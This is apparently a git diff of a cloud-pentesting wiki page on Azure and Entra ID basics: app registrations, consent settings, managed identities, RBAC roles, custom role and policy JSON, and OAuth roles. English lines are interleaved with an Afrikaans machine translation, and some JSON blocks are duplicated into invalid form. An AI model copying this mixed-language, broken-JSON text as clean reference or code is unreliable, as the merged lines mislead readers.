- If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again.
- If you choose certificate authentication, make sure the **application will have access over the private key**.
- As jy **wagwoord** autentisering kies (per standaard), **stoor die gegenereerde wagwoord** aangesien jy dit nie weer kan toegang nie.
- As jy sertifikaat autentisering kies, maak seker dat die **toepassing toegang sal hê oor die private sleutel**.
### App Registrations
### App Registrasies
An **App Registration** is a configuration that allows an application to integrate with Entra ID and to perform actions.
'n **App Registrasie** is 'n konfigurasie wat 'n toepassing toelaat om met Entra ID te integreer en aksies uit te voer.
#### Key Components:
#### Sleutel Komponente:
1. **Application ID (Client ID):** A unique identifier for your app in Azure AD.
2. **Redirect URIs:** URLs where Azure AD sends authentication responses.
3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions).&#x20;
1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID).
4. **API Permissions:** Specifies what resources or APIs the app can access.
5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect).
6. **Service Principal**: A service principal is created when an App is created (if it's done from the web console) or when it's installed in a new tenant.
1. The **service principal** will get all the requested permissions it was configured with.
1. **Toepassing ID (Kliënt ID):** 'n Unieke identifiseerder vir jou app in Azure AD.
2. **Herlei URIs:** URL's waar Azure AD autentisering antwoorde stuur.
3. **Sertifikate, Geheimen & Federale Kredite:** Dit is moontlik om 'n geheim of 'n sertifikaat te genereer om as die diens prinsipaal van die toepassing aan te meld, of om federale toegang aan dit te verleen (bv. Github Actions).&#x20;
1. As 'n **sertifikaat** of **geheim** gegenereer word, is dit moontlik vir 'n persoon om **as die diens prinsipaal** met CLI gereedskap aan te meld deur die **toepassing ID**, die **geheim** of **sertifikaat** en die **huur** (domein of ID) te ken.
4. **API Toestemmings:** Spesifiseer watter hulpbronne of API's die app kan toegang.
5. **Autentisering Instellings:** Definieer die app se ondersteunde autentisering vloei (bv., OAuth2, OpenID Connect).
6. **Diens Prinsipaal**: 'n diens prinsipaal word geskep wanneer 'n App geskep word (as dit vanaf die webkonsol gedoen word) of wanneer dit in 'n nuwe huur geïnstalleer word.
1. Die **diens prinsipaal** sal al die gevraagde toestemmings wat dit geconfigureer is, ontvang.
### Default Consent Permissions
### Standaard Toestemming Toestemmings
**User consent for applications**
**Gebruiker toestemming vir toepassings**
- **Do not allow user consent**
- An administrator will be required for all apps.
- **Allow user consent for apps from verified publishers, for selected permissions (Recommended)**
- All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization.
- **Default** low impact permissions (although you need to accept to add them as low):
- User.Read - sign in and read user profile
- offline_access - maintain access to data that users have given it access to
- openid - sign users in
- profile - view user's basic profile
- email - view user's email address
- **Allow user consent for apps (Default)**
- All users can consent for any app to access the organization's data.
- **Moet nie gebruiker toestemming toelaat nie**
- 'n Administrateur sal vir alle apps benodig word.
- **Laat gebruiker toestemming toe vir apps van geverifieerde uitgewers, vir geselekteerde toestemmings (Aanbeveel)**
- Alle gebruikers kan toestemming gee vir toestemmings wat as "lae impak" geklassifiseer is, vir apps van geverifieerde uitgewers of apps wat in hierdie organisasie geregistreer is.
- **Standaard** lae impak toestemmings (alhoewel jy moet aanvaar om hulle as laag by te voeg):
- User.Read - teken in en lees gebruikersprofiel
- offline_access - hou toegang tot data wat gebruikers toegang gegee het
- openid - teken gebruikers in
- profile - sien gebruiker se basiese profiel
- email - sien gebruiker se e-pos adres
- **Laat gebruiker toestemming toe vir apps (Standaard)**
- Alle gebruikers kan toestemming gee vir enige app om toegang tot die organisasie se data te verkry.
**Admin consent requests**: Default **No**
**Admin toestemming versoeke**: Standaard **Nee**
- Users can request admin consent to apps they are unable to consent to
- If **Yes**: Its possible to indicate Users, Groups and Roles that can consent requests
- Configure also if users will receive email notifications and expiration reminders&#x20;
- Gebruikers kan admin toestemming versoek vir apps waartoe hulle nie toestemming kan gee nie
- As **Ja**: Dit is moontlik om Gebruikers, Groepe en Rolle aan te dui wat toestemming versoeke kan gee
- Konfigureer ook of gebruikers e-pos kennisgewings en vervaldatums herinneringe sal ontvang&#x20;
### **Managed Identity (Metadata)**
### **Bestuurde Identiteit (Metadata)**
Managed identities in Azure Active Directory offer a solution for **automatically managing the identity** of applications. These identities are used by applications for the purpose of **connecting** to **resources** compatible with Azure Active Directory (**Azure AD**) authentication. This allows to **remove the need of hardcoding cloud credentials** in the code as the application will be able to contact the **metadata** service to get a valid token to **perform actions** as the indicated managed identity in Azure.
Bestuurde identiteite in Azure Aktiewe Gids bied 'n oplossing vir **outomatiese bestuur van die identiteit** van toepassings. Hierdie identiteite word deur toepassings gebruik om te **verbinde** met **hulpbronne** wat versoenbaar is met Azure Aktiewe Gids (**Azure AD**) autentisering. Dit maak dit moontlik om **die behoefte aan hardkoding van wolk akrediteer** in die kode te verwyder aangesien die toepassing in staat sal wees om die **metadata** diens te kontak om 'n geldige token te **verrig** as die aangeduide bestuurde identiteit in Azure.
There are two types of managed identities:
Daar is twee tipes bestuurde identiteite:
- **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you.
- **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**.
- **Stelsel-toegeken**. Sommige Azure dienste laat jou toe om 'n **bestuurde identiteit direk op 'n diens instansie** in te skakel. Wanneer jy 'n stelsel-toegeken bestuurde identiteit inskakel, word 'n **diens prinsipaal** geskep in die Entra ID huur wat deur die subskripsie vertrou word waar die hulpbron geleë is. Wanneer die **hulpbron** verwyder word, verwyder Azure outomaties die **identiteit** vir jou.
- **Gebruiker-toegeken**. Dit is ook moontlik vir gebruikers om bestuurde identiteite te genereer. Hierdie word binne 'n hulpbron groep binne 'n subskripsie geskep en 'n diens prinsipaal sal in die EntraID geskep word wat deur die subskripsie vertrou word. Dan kan jy die bestuurde identiteit aan een of **meer instansies** van 'n Azure diens toeken. Vir gebruiker-toegeken bestuurde identiteite, word die **identiteit apart bestuur van die hulpbronne wat dit gebruik**.
Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it.
Bestuurde Identiteite **genereer nie ewige akrediteer** (soos wagwoorde of sertifikate) om toegang te verkry as die diens prinsipaal wat aan dit geheg is.
### Enterprise Applications
### Enterprise Toepassings
Its just a **table in Azure to filter service principals** and check the applications that have been assigned to.
Dit is net 'n **tafel in Azure om diens prinsipale te filter** en die toepassings wat aan hulle toegeken is, te kontroleer.
**It isnt another type of “application”,** there isnt any object in Azure that is an Enterprise Application”, its just an abstraction to check the Service principals, App registrations and managed identities.
**Dit is nie 'n ander tipe "toepassing" nie,** daar is geen objek in Azure wat 'n "Enterprise Toepassing" is nie, dit is net 'n abstraksie om die Diens prinsipale, App registrasies en bestuurde identiteite te kontroleer.
### Administrative Units
### Administratiewe Eenhede
Administrative units allows to **give permissions from a role over a specific portion of an organization**.
Administratiewe eenhede laat toe om **toestemmings van 'n rol oor 'n spesifieke gedeelte van 'n organisasie te gee**.
Example:
Voorbeeld:
- Scenario: A company wants regional IT admins to manage only the users in their own region.
- Implementation:
- Create Administrative Units for each region (e.g., "North America AU", "Europe AU").
- Populate AUs with users from their respective regions.
- AUs can **contain users, groups, or devices**
- AUs support **dynamic memberships**
- AUs **cannot contain AUs**
- Assign Admin Roles:
- Grant the "User Administrator" role to regional IT staff, scoped to their region's AU.
- Outcome: Regional IT admins can manage user accounts within their region without affecting other regions.
- Scenario: 'n Maatskappy wil regionale IT admins toelaat om slegs die gebruikers in hul eie streek te bestuur.
- Implementering:
- Skep Administratiewe Eenhede vir elke streek (bv., "Noord-Amerika AU", "Europa AU").
- Vul AU's met gebruikers uit hul onderskeie streke.
- AU's kan **gebruikers, groepe, of toestelle** bevat
- AU's ondersteun **dinamiese lidmaatskappe**
- AU's **kan nie AU's bevat nie**
- Ken Admin Rolle toe:
- Gee die "Gebruiker Administrateur" rol aan regionale IT personeel, geskaal na hul streek se AU.
- Uitkoms: Regionale IT admins kan gebruikersrekeninge binne hul streek bestuur sonder om ander streke te beïnvloed.
### Entra ID Roles
### Entra ID Rolle
- In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID
- Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
- The most privileged role is **Global Administrator**
- In the Description of the role its possible to see its **granular permissions**
- Ten einde Entra ID te bestuur, is daar 'n paar **ingeboude rolle** wat aan Entra ID prinsipale toegeken kan word om Entra ID te bestuur
- Kyk na die rolle in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
- Die mees bevoorregte rol is **Globale Administrateur**
- In die Beskrywing van die rol is dit moontlik om sy **fynere toestemmings** te sien
## Roles & Permissions
## Rolle & Toestemmings
**Roles** are **assigned** to **principals** on a **scope**: `principal -[HAS ROLE]->(scope)`
**Rolle** word **toegeken** aan **prinsipale** op 'n **skaal**: `prinsipaal -[HEE ROLE]->(skaal)`
**Roles** assigned to **groups** are **inherited** by all the **members** of the group.
**Rolle** wat aan **groepe** toegeken word, word **geërf** deur al die **lede** van die groep.
Depending on the scope the role was assigned to, the **role** cold be **inherited** to **other resources** inside the scope container. For example, if a user A has a **role on the subscription**, he will have that **role on all the resource groups** inside the subscription and on **all the resources** inside the resource group.
Afhangende van die skaal waaraan die rol toegeken is, kan die **rol** **geërf** word na **ander hulpbronne** binne die skaal houer. Byvoorbeeld, as 'n gebruiker A 'n **rol op die subskripsie** het, sal hy daardie **rol op al die hulpbron groepe** binne die subskripsie hê en op **al die hulpbronne** binne die hulpbron groep.
### **Classic Roles**
### **Klassieke Rolle**
| **Owner** | <ul><li>Full access to all resources</li><li>Can manage access for other users</li></ul> | All resource types |
| ----------------------------- | ---------------------------------------------------------------------------------------- | ------------------ |
| **Contributor** | <ul><li>Full access to all resources</li><li>Cannot manage access</li></ul> | All resource types |
| **Reader** | • View all resources | All resource types |
| **User Access Administrator** | <ul><li>View all resources</li><li>Can manage access for other users</li></ul> | All resource types |
| **Eienaar** | <ul><li>Volledige toegang tot alle hulpbronne</li><li>Kan toegang vir ander gebruikers bestuur</li></ul> | Alle hulpbron tipes |
| ------------------------------- | ---------------------------------------------------------------------------------------- | ------------------ |
| **Bydraer** | <ul><li>Volledige toegang tot alle hulpbronne</li><li>Kan nie toegang bestuur nie</li></ul> | Alle hulpbron tipes |
| **Leser** | • Sien alle hulpbronne | Alle hulpbron tipes |
| **Gebruiker Toegang Administrateur** | <ul><li>Sien alle hulpbronne</li><li>Kan toegang vir ander gebruikers bestuur</li></ul> | Alle hulpbron tipes |
### Built-In roles
### Gebou-in rolle
[From the docs: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure role-based access control (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) has several Azure **built-in roles** that you can **assign** to **users, groups, service principals, and managed identities**. Role assignments are the way you control **access to Azure resources**. If the built-in roles don't meet the specific needs of your organization, you can create your own [**Azure custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
[Van die dokumentasie: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure rol-gebaseerde toegangbeheer (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) het verskeie Azure **gebou-in rolle** wat jy kan **toeken** aan **gebruikers, groepe, diens prinsipale, en bestuurde identiteite**. Rol toekennings is die manier waarop jy **toegang tot Azure hulpbronne** beheer. As die gebou-in rolle nie aan die spesifieke behoeftes van jou organisasie voldoen nie, kan jy jou eie [**Azure pasgemaakte rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
**Built-In** roles apply only to the **resources** they are **meant** to, for example check this 2 examples of **Built-In roles over Compute** resources:
**Gebou-in** rolle geld slegs vir die **hulpbronne** waarvoor hulle **bedoel** is, byvoorbeeld kyk na hierdie 2 voorbeelde van **Gebou-in rolle oor Compute** hulpbronne:
| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Provides permission to backup vault to perform disk backup. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Bied toestemming aan om rugsteun kluise te gebruik om disk rugsteun te doen. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
| ----------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ------------------------------------ |
| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | View Virtual Machines in the portal and login as a regular user. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
| [Virtuele Masjien Gebruiker Aanmelding](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | Sien Virtuele Masjiene in die portaal en meld aan as 'n gewone gebruiker. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**.
Hierdie rolle kan **ook toegeken word oor logiese houers** (soos bestuursgroepe, subskripsies en hulpbron groepe) en die prinsipale wat geraak word, sal dit **oor die hulpbronne binne daardie houers**.
- Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
- Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
- Vind hier 'n lys met [**alle Azure gebou-in rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
- Vind hier 'n lys met [**alle Entra ID gebou-in rolle**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
### Custom Roles
### Pasgemaakte Rolle
- Its also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
- They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups)
- Its possible to configure all the granular permissions the custom role will have
- Its possible to exclude permissions
- A principal with a excluded permission wont be able to use it even if the permissions is being granted elsewhere
- Its possible to use wildcards
- The used format is a JSON
- `actions` are for control actions over the resource
- `dataActions` are permissions over the data within the object
Example of permissions JSON for a custom role:
- Dit is ook moontlik om [**pasgemaakte rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) te skep
- Hulle word binne 'n skaal geskep, alhoewel 'n rol in verskeie skale kan wees (bestuursgroepe, subskripsie en hulpbron groepe)
- Dit is moontlik om al die fynere toestemmings wat die pasgemaakte rol sal hê, te konfigureer
- Dit is moontlik om toestemmings uit te sluit
- 'n prinsipaal met 'n uitgeslote toestemming sal dit nie kan gebruik nie, selfs al word die toestemming elders toegeken
- Dit is moontlik om wildcard te gebruik
- Die gebruikte formaat is 'n JSON
- `actions` is vir beheer aksies oor die hulpbron
- `dataActions` is toestemmings oor die data binne die objek
Voorbeeld van toestemmings JSON vir 'n pasgemaakte rol:
```json
{
"properties": {
"roleName": "",
"description": "",
"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
"permissions": [
{
"actions": [
"Microsoft.DigitalTwins/register/action",
"Microsoft.DigitalTwins/unregister/action",
"Microsoft.DigitalTwins/operations/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/write",
"Microsoft.CostManagement/exports/*"
],
"notActions": [
"Astronomer.Astro/register/action",
"Astronomer.Astro/unregister/action",
"Astronomer.Astro/operations/read",
"Astronomer.Astro/organizations/read"
],
"dataActions": [],
"notDataActions": []
}
]
}
"properties": {
"roleName": "",
"description": "",
"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
"permissions": [
{
"actions": [
"Microsoft.DigitalTwins/register/action",
"Microsoft.DigitalTwins/unregister/action",
"Microsoft.DigitalTwins/operations/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/write",
"Microsoft.CostManagement/exports/*"
],
"notActions": [
"Astronomer.Astro/register/action",
"Astronomer.Astro/unregister/action",
"Astronomer.Astro/operations/read",
"Astronomer.Astro/organizations/read"
],
"dataActions": [],
"notDataActions": []
}
]
}
}
```
### Permissies volgorde
### Permissions order
- In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**.
- An explicit **deny role assignment takes precedence** over the role granting the permission.
- Ten einde vir 'n **hoofpersoon om toegang tot 'n hulpbron te hê** moet daar 'n eksplisiete rol aan hom toegeken word (op enige manier) **wat hom daardie toestemming gee**.
- 'n Eksplisiete **weier roltoewysing het voorrang** bo die rol wat die toestemming gee.
<figure><img src="../../../images/image (191).png" alt=""><figcaption><p><a href="https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10">https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10</a></p></figcaption></figure>
### Global Administrator
### Globale Administrateur
Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default.
Globale Administrateur is 'n rol van Entra ID wat **volledige beheer oor die Entra ID huurder gee**. Dit gee egter nie standaard enige toestemmings oor Azure hulpbronne nie.
Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\
This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
Gebruikers met die Globale Administrateur rol het die vermoë om '**te verhoog' na die Gebruikerstoegang Administrateur Azure rol in die Wortelbestuursgroep**. So kan Globale Administrateurs toegang in **alle Azure subskripsies en bestuursgroepe bestuur.**\
Hierdie verhoging kan aan die einde van die bladsy gedoen word: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
<figure><img src="../../../images/image (349).png" alt=""><figcaption></figcaption></figure>
### Azure Policies
### Azure Beleide
**Azure Policies** are rules that help organizations ensure their resources meet specific standards and compliance requirements. They allow you to **enforce or audit settings on resources in Azure**. For example, you can prevent the creation of virtual machines in an unauthorized region or ensure that all resources have specific tags for tracking.
**Azure Beleide** is reëls wat organisasies help om te verseker dat hul hulpbronne aan spesifieke standaarde en nakomingsvereistes voldoen. Hulle stel jou in staat om **instellings op hulpbronne in Azure af te dwing of te oudit**. Byvoorbeeld, jy kan die skepping van virtuele masjiene in 'n nie-geautoriseerde streek voorkom of verseker dat alle hulpbronne spesifieke etikette het vir opsporing.
Azure Policies are **proactive**: they can stop non-compliant resources from being created or changed. They are also **reactive**, allowing you to find and fix existing non-compliant resources.
Azure Beleide is **proaktief**: hulle kan nie-nakomende hulpbronne stop om geskep of verander te word. Hulle is ook **reaktief**, wat jou toelaat om bestaande nie-nakomende hulpbronne te vind en reg te stel.
#### **Key Concepts**
#### **Belangrike Konsepte**
1. **Policy Definition**: A rule, written in JSON, that specifies what is allowed or required.
2. **Policy Assignment**: The application of a policy to a specific scope (e.g., subscription, resource group).
3. **Initiatives**: A collection of policies grouped together for broader enforcement.
4. **Effect**: Specifies what happens when the policy is triggered (e.g., "Deny," "Audit," or "Append").
1. **Beleid Definisie**: 'n Reël, geskryf in JSON, wat spesifiseer wat toegelaat of vereis word.
2. **Beleid Toewysing**: Die toepassing van 'n beleid op 'n spesifieke omvang (bv. subskripsie, hulpbron groep).
3. **Inisiatiewe**: 'n Versameling van beleide wat saamgegroepeer is vir breër afdwinging.
4. **Effek**: Spesifiseer wat gebeur wanneer die beleid geaktiveer word (bv. "Weier," "Oudit," of "Voeg by").
**Some examples:**
**Sommige voorbeelde:**
1. **Ensuring Compliance with Specific Azure Regions**: This policy ensures that all resources are deployed in specific Azure regions. For example, a company might want to ensure all its data is stored in Europe for GDPR compliance.
2. **Enforcing Naming Standards**: Policies can enforce naming conventions for Azure resources. This helps in organizing and easily identifying resources based on their names, which is helpful in large environments.
3. **Restricting Certain Resource Types**: This policy can restrict the creation of certain types of resources. For example, a policy could be set to prevent the creation of expensive resource types, like certain VM sizes, to control costs.
4. **Enforcing Tagging Policies**: Tags are key-value pairs associated with Azure resources used for resource management. Policies can enforce that certain tags must be present, or have specific values, for all resources. This is useful for cost tracking, ownership, or categorization of resources.
5. **Limiting Public Access to Resources**: Policies can enforce that certain resources, like storage accounts or databases, do not have public endpoints, ensuring that they are only accessible within the organization's network.
6. **Automatically Applying Security Settings**: Policies can be used to automatically apply security settings to resources, such as applying a specific network security group to all VMs or ensuring that all storage accounts use encryption.
1. **Verseker Nakoming met Spesifieke Azure Streke**: Hierdie beleid verseker dat alle hulpbronne in spesifieke Azure streke ontplooi word. Byvoorbeeld, 'n maatskappy mag wil verseker dat al sy data in Europa gestoor word vir GDPR-nakoming.
2. **Afgedwonge Naamstandaarde**: Beleide kan naamkonvensies vir Azure hulpbronne afdwing. Dit help om hulpbronne te organiseer en maklik te identifiseer op grond van hul name, wat nuttig is in groot omgewings.
3. **Beperking van Sekere Hulpbron Tipes**: Hierdie beleid kan die skepping van sekere tipes hulpbronne beperk. Byvoorbeeld, 'n beleid kan ingestel word om die skepping van duur hulpbron tipes, soos sekere VM-groottes, te voorkom om koste te beheer.
4. **Afgedwonge Etikettering Beleide**: Etikette is sleutel-waarde pare wat met Azure hulpbronne geassosieer word en gebruik word vir hulpbronbestuur. Beleide kan afdwing dat sekere etikette teenwoordig moet wees, of spesifieke waardes moet hê, vir alle hulpbronne. Dit is nuttig vir kostesporing, eienaarskap, of kategorisering van hulpbronne.
5. **Beperking van Publieke Toegang tot Hulpbronne**: Beleide kan afdwing dat sekere hulpbronne, soos stoor rekeninge of databasisse, nie publieke eindpunte het nie, wat verseker dat hulle slegs binne die organisasie se netwerk toeganklik is.
6. **Outomatiese Toepassing van Sekuriteitsinstellings**: Beleide kan gebruik word om outomaties sekuriteitsinstellings op hulpbronne toe te pas, soos om 'n spesifieke netwerk sekuriteitsgroep op alle VM's toe te pas of te verseker dat alle stoor rekeninge versleuteling gebruik.
Note that Azure Policies can be attached to any level of the Azure hierarchy, but they are **commonly used in the root management group** or in other management groups.
Azure policy json example:
Let daarop dat Azure Beleide aan enige vlak van die Azure hiërargie geheg kan word, maar hulle word **gewoonlik in die wortelbestuursgroep** of in ander bestuursgroepe gebruik.
Azure beleid json voorbeeld:
```json
{
"policyRule": {
"if": {
"field": "location",
"notIn": ["eastus", "westus"]
},
"then": {
"effect": "Deny"
}
},
"parameters": {},
"displayName": "Allow resources only in East US and West US",
"description": "This policy ensures that resources can only be created in East US or West US.",
"mode": "All"
"policyRule": {
"if": {
"field": "location",
"notIn": ["eastus", "westus"]
},
"then": {
"effect": "Deny"
}
},
"parameters": {},
"displayName": "Allow resources only in East US and West US",
"description": "This policy ensures that resources can only be created in East US or West US.",
"mode": "All"
}
```
### Toestemmings Erf
### Permissions Inheritance
In Azure **kan toestemmings aan enige deel van die hiërargie toegeken word**. Dit sluit bestuursgroepe, subskripsies, hulpbron groepe, en individuele hulpbronne in. Toestemmings word **geërf** deur die ingeslote **hulpbronne** van die entiteit waar hulle toegeken is.
In Azure **permissions are can be assigned to any part of the hierarchy**. That includes management groups, subscriptions, resource groups, and individual resources. Permissions are **inherited** by contained **resources** of the entity where they were assigned.
This hierarchical structure allows for efficient and scalable management of access permissions.
Hierdie hiërargiese struktuur stel doeltreffende en skaalbare bestuur van toegangstoestemmings in staat.
<figure><img src="../../../images/image (26).png" alt=""><figcaption></figcaption></figure>
### Azure RBAC vs ABAC
**RBAC** (role-based access control) is what we have seen already in the previous sections: **Assigning a role to a principal to grant him access** over a resource.\
However, in some cases you might want to provide **more fined-grained access management** or **simplify** the management of **hundreds** of role **assignments**.
**RBAC** (rol-gebaseerde toegangbeheer) is wat ons reeds in die vorige afdelings gesien het: **'n rol aan 'n prinsiep toe te ken om hom toegang te gee** oor 'n hulpbron.\
E however, in sommige gevalle wil jy dalk **meer fyn-gegradeerde toegangsbewaking** of **vereenvoudig** die bestuur van **honderde** rol **toekennings**.
Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\
You **cannot** explicitly **deny** **access** to specific resources **using conditions**.
Azure **ABAC** (attribuut-gebaseerde toegangbeheer) bou op Azure RBAC deur **roltoekenningsvoorwaardes gebaseer op attribuute** in die konteks van spesifieke aksies by te voeg. 'n _roltoekenningsvoorwaarde_ is 'n **addisionele kontrole wat jy opsioneel aan jou roltoekenning kan voeg** om meer fyn-gegradeerde toegangbeheer te bied. 'n Voorwaarde filter die toestemmings wat as deel van die roldefinisie en roltoekenning toegeken word. Byvoorbeeld, jy kan **'n voorwaarde byvoeg wat vereis dat 'n objek 'n spesifieke etiket moet hê om die objek te lees**.\
Jy **kan nie** eksplisiet **toegang** tot spesifieke hulpbronne **weier nie** **met behulp van voorwaardes**.
## References
## Verwysings
- [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview)
- [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions)
@@ -379,7 +375,3 @@ You **cannot** explicitly **deny** **access** to specific resources **using cond
- [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration)
{{#include ../../../banners/hacktricks-training.md}}

192
src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
View File

@@ -4,98 +4,97 @@
## Basic Information
Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implements the OAuth 2.0 authorization framework and the OpenID Connect (OIDC) authentication protocol to manage access to resources.
Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implementeer die OAuth 2.0-autoriseringsraamwerk en die OpenID Connect (OIDC) autentikasieprotokol om toegang tot hulpbronne te bestuur.
### OAuth
**Key Participants in OAuth 2.0:**
**Belangrike Deelnemers in OAuth 2.0:**
1. **Resource Server (RS):** Protects resources owned by the resource owner.
2. **Resource Owner (RO):** Typically an end-user who owns the protected resources.
3. **Client Application (CA):** An application seeking access to resources on behalf of the resource owner.
4. **Authorization Server (AS):** Issues access tokens to client applications after authenticating and authorizing them.
1. **Hulpbronbediener (RS):** Beskerm hulpbronne wat deur die hulpbron eienaar besit word.
2. **Hulpbron Eienaar (RO):** Tipies 'n eindgebruiker wat die beskermde hulpbronne besit.
3. **Kliënttoepassing (CA):** 'n Toepassing wat toegang tot hulpbronne soek namens die hulpbron eienaar.
4. **Autoriseringsbediener (AS):** Gee toegangstokens aan kliënttoepassings nadat dit hulle geverifieer en geautoriseer het.
**Scopes and Consent:**
**Skoppe en Toestemming:**
- **Scopes:** Granular permissions defined on the resource server that specify access levels.
- **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes.
- **Skoppe:** Fyn gespesifiseerde toestemmings op die hulpbronbediener wat toegangsvlakke spesifiseer.
- **Toestemming:** Die proses waardeur 'n hulpbron eienaar 'n kliënttoepassing toestemming gee om toegang tot hulpbronne met spesifieke skoppe te verkry.
**Microsoft 365 Integration:**
**Microsoft 365 Integrasie:**
- Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications.
- These applications are deeply integrated and often have interdependent service relationships.
- To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications.
- **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l.
- These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces.
- Microsoft 365 gebruik Azure AD vir IAM en bestaan uit verskeie "eerste-party" OAuth-toepassings.
- Hierdie toepassings is diep geïntegreer en het dikwels onderling afhanklike diensverhoudings.
- Om die gebruikerservaring te vereenvoudig en funksionaliteit te handhaaf, gee Microsoft "implisiete toestemming" of "vooraf toestemming" aan hierdie eerste-party toepassings.
- **Implisiete Toestemming:** Sekere toepassings word outomaties **toegang tot spesifieke skoppe sonder eksplisiete gebruiker of administrateur goedkeuring gegee**.
- Hierdie vooraf goedgekeurde skoppe is tipies verborge vir beide gebruikers en administrateurs, wat dit minder sigbaar maak in standaard bestuursinterfaces.
**Client Application Types:**
**Kliënttoepassing Tipes:**
1. **Confidential Clients:**
- Possess their own credentials (e.g., passwords or certificates).
- Can **securely authenticate themselves** to the authorization server.
2. **Public Clients:**
- Do not have unique credentials.
- Cannot securely authenticate to the authorization server.
